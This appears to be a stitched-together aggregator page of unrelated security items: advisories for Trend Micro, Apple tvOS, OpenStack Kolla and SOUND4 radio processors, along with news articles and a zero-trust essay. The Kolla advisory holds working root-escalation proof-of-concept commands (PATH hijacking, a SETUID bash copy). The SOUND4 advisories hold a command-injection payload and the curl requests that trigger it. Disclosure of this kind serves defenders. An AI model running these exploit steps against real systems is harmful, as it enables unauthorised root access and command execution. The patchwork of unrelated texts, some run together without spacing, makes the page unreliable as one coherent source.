A link following vulnerability in the Damage Cleanup Engine component of Trend Micro Apex One and Trend Micro Apex One as a Service could allow a local attacker to escalate privileges by creating a symbolic link and abusing the service to delete a file. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

December 15th, 2022

**Trend Micro Apex One Damage Cleanup Engine Link Following Local Privilege Escalation Vulnerability****ZDI-22-1665  
ZDI-CAN-16543**

CVE ID

CVE-2022-45798

CVSS SCORE

7.8, (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Trend Micro  

AFFECTED PRODUCTS

Apex One  

VULNERABILITY DETAILS

This vulnerability allows local attackers to escalate privileges on affected installations of Trend Micro Apex One Security Agent. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the Damage Cleanup Engine, which runs within the Trend Micro Common Client Real-time Scan Service. By creating a junction, an attacker can abuse the service to delete a folder. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.  

ADDITIONAL DETAILS

Trend Micro has issued an update to correct this vulnerability. More details can be found at:  
https://success.trendmicro.com/solution/000291830  

DISCLOSURE TIMELINE

*   2022-06-28 - Vulnerability reported to vendor
*   2022-12-15 - Coordinated public release of advisory

CREDIT

Abdelhamid Naceri  

BACK TO ADVISORIES

CVE-2022-45798: ZDI-22-1665

Video conferencing platform fixes cross-site scripting vulnerability

Video conferencing platform fixes cross-site scripting vulnerability

  

Zoom has patched a cross-site scripting (XSS) bug that worked in both the desktop and web versions of its Whiteboard app.

Zoom Whiteboard allows users to collaborate in real-time on a shared canvas by adding and editing different objects. Whiteboard runs JavaScript code both in the browser and the desktop app.

**Escaping sanitization**

The XSS bug in Zoom Whiteboard was discovered by security researcher Eugene Lim (also known as ‘spaceraccoon’). Lim focuses on the overlap between web, mobile, desktop, and other platforms, which is how he became interested in investigating Zoom Whiteboard.

Whiteboard supports several types of objects, including text, shapes, rich text, images, and sticky notes.

To store and transfer objects, it uses Protocol Buffer (), a language- and platform-neutral markup standard for serializing structured data. It uses WebSocket to broadcast objects across all clients and provide real-time updates on the whiteboard.

Read more of the latest news about web security vulnerabilities

Once received, the client transforms the object into its corresponding React component and inserts it into the user interface.

React automatically sanitizes all HTML attributes contained in the whiteboard objects. However, a few of the objects allow some HTML tags. For some objects, the developers used custom regex functions to sanitize user input and remove disallowed tags.

Lim discovered that with a well-crafted HTML string, he could bypass the sanitization check and send arbitrary JavaScript code to all other clients and stage an XSS attack.

**Weaponizing the clipboard**

Exploiting the bug would require a complicated effort by the attacker.

“WebSocket messages are sent in the format. This makes it tricky to write a proof-of-concept that’s easy for triagers to reproduce because they need to intercept the WebSocket request as well as modify the message correctly before the request is dropped,” Lim told The Daily Swig.

To overcome this challenge, he developed an end-to-end proof of concept script that used the clipboard to create and deliver the XSS payload.

**The challenges of hybrid applications**

Lim believes there are two factors that make it difficult to find and plug such bugs. First is the breadth and depth of JavaScript web APIs that support additional features.

“From WebRTC (video calling) to WebGL (2D/3D graphics), there’s a lot more you can do in a browser nowadays than simply pop an alert. This increases the attack surface and potential for bypasses,” he said.

And second is the growing overlap between web and native/desktop applications.

“Developers need to secure their apps across multiple platforms, which increases the complexity as JavaScript in React on Safari might work slightly differently than React Native with Hermes on Android,” Lim said.

**Check your third-party dependencies**

Finally, Lim warned about flaws in third-party dependencies.

“Code scanning tools did not pick up the actual \[Zoom\] vulnerability because the user input flowed through a third-party dependency,” he said.

Typically, code scans in CI/CD pipelines do not install third-party dependencies and run only on the project source code.

“The takeaway here is to be very aware of the third-party components you are using and how you are using them,” Lim said. “Additionally, regexes are very tricky to do yourself so it may be better to rely on libraries like DOMPurify.”

DON’T MISS How to become a penetration tester: Part 2 – ‘Mr hacking’ John Jackson on the virtue of ‘endless curiosity’

Zoom Whiteboard patches XSS bug

Apple Security Advisory 2022-12-13-7 - tvOS 16.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-7 tvOS 16.2

tvOS 16.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213535.

Accounts  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved data protection.  
CVE-2022-42843: Mickey Jin (@patch1t)

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Parsing a maliciously crafted video file may lead to kernel  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

AppleMobileFileIntegrity  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing

AVEVideoEncoder  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A logic issue was addressed with improved checks.  
CVE-2022-42848: ABC Research s.r.o

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing a maliciously crafted file may lead to arbitrary  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46693: Mickey Jin (@patch1t)

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Parsing a maliciously crafted TIFF file may lead to  
disclosure of user information  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42851: Mickey Jin (@patch1t)

IOHIDFamily  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

IOMobileFrameBuffer  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46690: John Aakerblom (@jaakerblom)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Connecting to a malicious NFS server may lead to arbitrary  
code execution with kernel privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-46701: Felix Poulin-Belanger

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

Preferences  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to use arbitrary entitlements  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-42855: Ivan Fratric of Google Project Zero

Safari  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: A spoofing issue existed in the handling of URLs. This  
issue was addressed with improved input validation.  
CVE-2022-46695: KirtiKumar Anandrao Ramchandani

Software Update  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A user may be able to elevate privileges  
Description: An access issue existed with privileged API calls. This  
issue was addressed with additional restrictions.  
CVE-2022-42849: Mickey Jin (@patch1t)

Weather  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-42866: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited against versions of iOS released  
before iOS 15.1.  
Description: A type confusion issue was addressed with improved state  
handling.  
WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

Additional recognition

Kernel  
We would like to acknowledge Zweig of Kunlun Lab for their  
assistance.

Safari Extensions  
We would like to acknowledge Oliver Dunk and Christian R. of  
1Password for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher and scarlet for  
their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke  
NxkItA/+LIwJ66Odl7Uwp1N/qek5Z/TBuPKlbgTwRZGT3LBVMVmyHTBzebA88aNq  
Pae1RKQ2Txw4w9Tb7a08eeqRQD51MBoSjTxf23tO1o0B1UR3Hgq3gsOSjh/dTq9V  
Jvy4DpO15xdVHP3BH/li114JpgR+FoD5Du0rPffL01p6YtqeWMSvnRoCmwNcIqou  
i2ZObfdrL2WJ+IiDIlMoJ3v+B1tDxOWR6Mn37iRdzl+QgrQMQtP9pSsiAPCntA+y  
eFM5Hp0JlOMtCfA+xT+LRoZHCbjTCFMRlRbNffGvrNwwdTY4MXrSYlKcIo3yFT2m  
KSHrQNvqzWhmSLAcHlUNo0lVvtPAlrgyilCYaeRNgRC1+x8KRf/AcErXr23oKknJ  
lzIF6eVk1K3mxUmR+M+P8+cr14pbrUwJcQlm0In6/8fUulHtcElLE3fJ+HJVImx8  
RtvNmuCng5iEK1zlwgDvAKO3EgMrMtduF8aygaCcBmt65GMkHwvOGCDXcIrKfH9U  
sP4eY7V3t4CQd9TX3Vlmt47MwRTSVuUtMcQeQPhEUTdUbM7UlvtW8igrLvkz9uPn  
CpuE2mzhd/dJANXvMFBR9A0ilAdJO1QD/uSWL+UbKq4BlyiW5etd8gObQfHqqW3C  
sh0EwxLh4ATicRS9btAJMwIfK/ulYDWp4yuIsUamDj/sN9xWvXY=  
=i2O9  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-7

A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**SUMMARY**

A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

**PRODUCT URLS**

OpenStack - https://opendev.org/openstack/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**DETAILS**

OpenStack Kolla provides container images and deployment tools for running OpenStack clouds with best practice configurations.

Several Kolla containers have a sudoers policy to allow the application to run limited commands as root, which appears to be defined here:

    Matching Defaults entries for nova on <host>:
        setenv
    
    User nova may run the following commands on <host>:
        (root) NOPASSWD: /usr/local/bin/kolla_copy_cacerts
        (root) NOPASSWD: /usr/local/bin/kolla_set_configs
        ...
    

Of note is the Defaults: %kolla setenv line in /etc/sudoers. This allows users in the kolla group to modify environment variables, and there is no secure_path option that enforces a trusted PATH environment variable. Therefore, the unprivileged user (nova in this example) can change the PATH variable used by sudo, and run arbitrary commands as root when the Kolla scripts call external programs.

Specifically, there are two Kolla-provided scripts that are exploitable via this sudoers configuration.

The first script, kolla\_copy\_cacerts, calls out to the update-ca-certificates program, which is resolved from the PATH environment variable. This can be exploited by creating a script named “update-ca-certificates” in some writable location, and adding this location to the PATH before running sudo -E kolla_copy_cacerts.

The second script, kolla\_set\_configs, reads an environment variable for a JSON object or a path to a file containing a JSON object. This JSON specifies the source, destination, ownership and permissions for OpenStack configuration files to be copied. This can be exploited by exporting an environment variable that specifies a program to be copied with its SETUID bit set, and running kolla_set_configs with sudo -E as above.

Some containers (e.g. nova\_api) with this configuration are privileged, so in that case, root access inside the container may equate to root privilege on the container host itself.

**Exploit Proof of Concept****Method 1 (kolla_copy_cacerts)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a script payload that will be executed as root:

    $ echo -e '#!/bin/sh\nexec bash -p' > /tmp/update-ca-certificates
    $ chmod 755 /tmp/update-ca-certificates
    

Update the shell’s PATH environment variable to include the directory that the payload is in, and run the affected script with sudo:

    $ PATH=/tmp:$PATH sudo -E /usr/local/bin/kolla_copy_cacerts
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Method 2 (kolla_set_configs)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a JSON object to be parsed by the script and export it to the appropriate environment variable:

    $ export KOLLA_CONFIG='{"command":"echo test", "config_files":[{"source":"/bin/bash", "dest":"/tmp/bash", "owner":"root", "perm":"0o6755"}]}'
    

Run the affected script with sudo and then execute the copied shell:

    $ sudo -E /usr/local/bin/kolla_set_configs
    $ /tmp/bash -p
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Mitigation**

/etc/sudoers within the container should use the secure_path option to prevent the PATH environment variable from being modified; however this will not prevent other possibly dangerous environment variables from being changed. Ideally, the setenv option would be removed from /etc/sudoers altogether, and env_keep could be used for any safe environment variables that do not introduce security holes.

To avoid container compromises resulting in host compromise, avoid using privileged containers; prefer adding individual capabilities as needed.

**TIMELINE**

2022-08-11 - Vendor Disclosure  
2022-08-11 - Initial Vendor Contact  
2022-12-20 - Public Release

CVE-2022-38060: TALOS-2022-1589 || Cisco Talos Intelligence Group

Plus: An FBI platform got hacked, an ex-Twitter employee is sentenced for espionage, malicious Windows 10 installers circulate in Ukraine, and more.

As Russia's invasion of Ukraine drags on, navigation system monitors reported this week that they've detected a rise in GPS disruptions in Russian cities, ever since Ukraine began mounting long-range drone attacks. Elsewhere, a lawsuit against Meta alleges that a lack of adequate hate-speech moderation on Facebook led to violence that exacerbated Ethiopia's civil war. 

New evidence suggests that attackers planted data to frame an Indian priest who died in police custody—and that the hackers may have collaborated with law enforcement as he was investigated. The Russia-based ransomware gang Cuba abused legitimate Microsoft certificates to sign some of their malware, a method of falsely legitimatizing hacking tools that cybercriminals have particularly been relying on lately. And with the one-year anniversary of the Log4Shell vulnerability, researchers and security professionals reflected on the current state of open source supply-chain security, and what must be done to improve patch adoption.

We also explored the confluence of factors and circumstances leading to radicalization and extremism in the United States. And Meta gave WIRED some insight into the difficulty of enabling users to recover their accounts when they get locked out—without allowing attackers to exploit those same mechanisms for account takeovers.

But wait, there’s more! Each week, we highlight the security news we didn’t cover in depth ourselves. Click on the headlines below to read the full stories.

Alexey Brayman, 35, was one of seven people named in a 16-count federal indictment this week in which they were accused of operating an international smuggling ring over the past five years, illegally exported restricted technology to Russia. Brayman was taken into custody on Tuesday and later released on a $150,000 bond, after being ordered to forfeit his passport and abide by a curfew. He is an Israeli citizen who was born in Ukraine. Brayman and his wife, Daria, live in Merrimack, New Hampshire, a small town where the two ran an online craft business out of their home. “They are the nicest family,” a delivery driver who regularly drops off packages at their home told _The Boston Globe_. “They’ll leave gift cards out around the holidays. And snacks.” The indictment alleges, though, that their house was a staging site for “millions of dollars in military and sensitive dual-use technologies from US manufacturers and vendors.” Two other suspects connected to the case have also been arrested in New Jersey and Estonia.

A hacker breached the FBI information-sharing database InfraGard this week, compromising data from more than 80,000 members who share details and updates through the platform related to critical infrastructure in the United States. Some of the data is sensitive and pertains to national and digital security threats. Last weekend, the hacker posted samples of data stolen from the platform on a relatively new cybercriminal forum called Breached. They priced the database at $50,000 for the full contents. The hacker claims to have gained access to InfraGard by posing as the CEO of a finance company. The FBI said it was “aware of a potential false account associated with the InfraGard Portal and that it is actively looking into the matter.”

Former Twitter employee Ahmad Abouammo was convicted in August of being paid to send user data to the Saudi Arabian government while working at the tech company. He was also found guilty of money laundering, wire fraud, and falsification of records. He has now been sentenced to 42 months in prison. Abouammo worked at Twitter from 2013 to 2015. “This case revealed that foreign governments will bribe insiders to obtain the user information that is collected and stored by our Silicon Valley social-media companies,” US attorney Stephanie Hinds said in a statement. “This sentence sends a message to insiders with access to user information to safeguard it, particularly from repressive regimes, or risk significant time in prison.” Earlier this year, whistleblower and former Twitter security chief Peiter Zatko alleged that Twitter has long had problems with foreign agents infiltrating the company. The situation has been of particular concern as new CEO Elon Musk massively overhauls the company and its workforce.

In an effort to compromise Ukrainian government networks,  hackers have been posting malicious Windows 10 installers on torrent sites used in Ukraine and Russia, according to researchers from the security firm Mandiant. The installers were set up with the Ukrainian language pack and were free to download. They deployed malware for reconnaissance, data gathering, and exfiltration. Mandiant said it could not definitively attribute the campaign to specific hackers, but that the targets overlap with those that have been attacked in past hacks by the Russian military intelligence agency GRU.

Years after it was proved vulnerable and insecure, the US National Institute of Standards and Technology said on Thursday that the SHA-1 cryptographic algorithm should be removed from all software platforms by December 31, 2030. Developers should turn instead to algorithms with more robust security, namely SHA-2 and SHA-3. The “security hash algorithm,” or SHA, was developed by the National Security Agency and debuted in 1993. SHA-1 is a slightly modified replacement used since 1995. By 2005 it was clear that SHA-1 was “cryptographically broken,” but it remained in widespread use for years. NIST said this week, though, that attacks on SHA-1 “have become increasingly severe.” Developers have eight years to migrate away for any remaining uses of the algorithm. "Modules that still use SHA-1 after 2030 will not be permitted for purchase by the federal government,” NIST computer scientist Chris Celi said in a statement.

An Alleged Russian Smuggling Ring Was Uncovered in New Hampshire

Accelerating security challenges and the increasing footprint of edge and IoT devices call for zero-trust principles to drive cyber resiliency.

As businesses ramp up their adoption of edge and Internet of Things (IoT) infrastructure, security risks that already challenge IT organizations stand to become trickier than ever. The distributed nature of edge devices, the scale of IoT, and the limited compute capacity of devices at the edge heap on added difficulties to the increasingly shaky traditional security practices of yesteryear. In the era of edge, it simply won't be feasible anymore to cling to the castle-and-moat security tactics that practitioners have held on to for probably a decade too long as it was.  

Zero-trust principles are going to be key to meeting the security challenges of today and tomorrow — and fundamental to that will be architecting secure server hardware that stands at the bedrock of edge architecture.

**The Challenges Calling for Zero Trust**

Edge and IoT notwithstanding, security threats keep growing. Recent statistics show that global attack rates are up by 28% in the last year. Credential theft, account takeovers, lateral attacks, and DDoS attacks plague organizations of all sizes. And the costs of cybercrime keep ticking upward. Recent figures by the FBI's Internet Crime Complaint Center (IC3) found that cybercrime costs in the US topped $6.9 billion, up dramatically from $1.4 billion in 2017.

Throwing transformative technology architectures into this mix will only exacerbate matters if security isn't baked into the design. Without proper planning, securing assets and processes at the edge becomes more difficult to manage due to the rapidly proliferating pool of enterprise devices.

Market stats show that there are already more than 12.2 billion active IoT and edge endpoints worldwide, with expectations that by 2025 the figure will balloon to 27 billion. Organizations carry more risk because these devices are different than traditional on-premises IT devices. Devices at the edge — particularly IoT devices — frequently:

*   Process critical data away from data centers, with data including more private information
*   Are not supported or secured as strongly by many device manufacturers
*   Don't control passwords and authentication as strongly as traditional endpoints
*   Have limited compute capacity to implement security controls or updates
*   Are geographically distributed in nonsecured physical locations with no barbed wire, cameras, or barriers protecting them

All of this adds up to an enlarged attack surface that is extremely difficult to manage due to the sheer scale of devices out there. Policies and protocols are harder to implement and manage across the edge. Even something as "simple" as doing software updates can be a huge task. For example, often IoT firmware updates require manual or even physical intervention. If there are thousands or even tens of thousands of those devices run by an organization, this quickly becomes a quagmire for an IT team. Organizations need better methods for pushing out these updates, doing remote reboots, and performing malware remediation, not to mention monitoring and tracking the security status of all of these devices.

**More Than Authentication: The Promise of Zero Trust**

Zero trust is a set of guiding principles and an architectural approach to security that's well-suited to start addressing some of the edge security challenges outlined above. The heart of the zero-trust approach is in conditional access. The idea is that the right assets, accounts, and users are only granted access to the assets they need — when they're authorized, and when the situation is safely in line with the org's risk appetite. The architecture is designed to continually evaluate and validate all of the devices and behaviors in the IT environment before granting permissions and also periodically during use. It's great for the fluidity of the edge because it's not tied to the physical location of a device, network location, or asset ownership.

It's a sweeping approach, and one that can help reduce the risk surface at the edge when it is done right. Unfortunately, many organizations have taken a myopic view of zero trust, equating it solely as an authentication and authorization play. But there are a whole lot of other crucial elements to the architecture that enterprises need to get in place.

Arguably the most critical element of zero trust is the verification of assets before access is granted**.** While secure authentication and authorization is crucial, organizations also need mechanisms to ensure the security of the device that's connecting to sensitive assets and networks — including servers handling edge traffic. This includes verifying the status of the firmware in place, monitoring the integrity of the hardware, looking for evidence of compromised hardware, and more.

**Enabling Zero Trust With the Right Hardware**

While there is no such thing as zero-trust devices, organizations can set themselves up for zero-trust success by seeking out edge hardware that's more cyber resilient and enables easier verification of assets to stand up to the rigors of a strong zero-trust approach to security.

This means paying close attention to the way vendors architect their hardware. Ask questions to ensure they're paying more than just marketing lip service to the zero trust ideal. Do they follow a framework like the US Department of Defense's seven-pillar zero-trust standards? Looking for important controls for device trust, user trust, data trust, and software trust baked into the products that organizations choose to make up their edge architecture will in turn help them build zero trust into their own architecture.

Zero Trust in the Era of Edge

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a conditional command injection vulnerability in traceroute.php.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (traceroute.php) Conditional Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: This vulnerability allows a local authenticated user to create afile in the /tmp directory that contains malicious commands. The filemust have the filename ending with .traceroute.pid, and the commands inthe file can only be executed once by an external unauthenticated attacker.By calling the vulnerable script and making a single HTTP POST request,the attacker can gain command execution on the system. After the requestis made, the file containing the malicious commands will be deleted.-------------------------------------------------------------------------/var/www/traceroute.php:------------------------02:    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['traceroute_host']) && isset($_POST['networkid'])) {03:        $pidfilename="/tmp/" . $_POST['networkid'] . ".traceroute.pid";04:        if( file_exists($pidfilename)) {05:             $procid=file_get_contents($pidfilename);06:             shell_exec("pkill -P ".$procid);07:        }......29:            unlink($pidfilename);30:            exit();-------------------------------------------------------------------------Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5740Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5740.php26.09.2022--#On the server> echo ";id>/var/www/b" > /tmp/251.traceroute.pid#External> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=t00t&networkid=251"> curl -XPOST -sk https://RADIO/buid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x traceroute.php Conditional Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below allow an unauthenticated attacker to send network signals to an arbitrary target host that can be abused in an ICMP flooding attack. This includes the utilization of the ping, traceroute and nslookup commands through ping.php, traceroute.php and dns.php respectively.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (ping/traceroute) ICMP Flood AttackVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application allows an unauthenticated attacker to send networksignals to an arbitrary target host that can be abused in an ICMP floodingattack. This includes the utilisation of the ping, traceroute and nslookupcommands through ping.php, traceroute.php and dns.php respectively.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5728Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5728.php26.09.2022--> curl -XPOST -sk https://RADIO/ping.php --data "ping_host=localhost&networkid=251" # 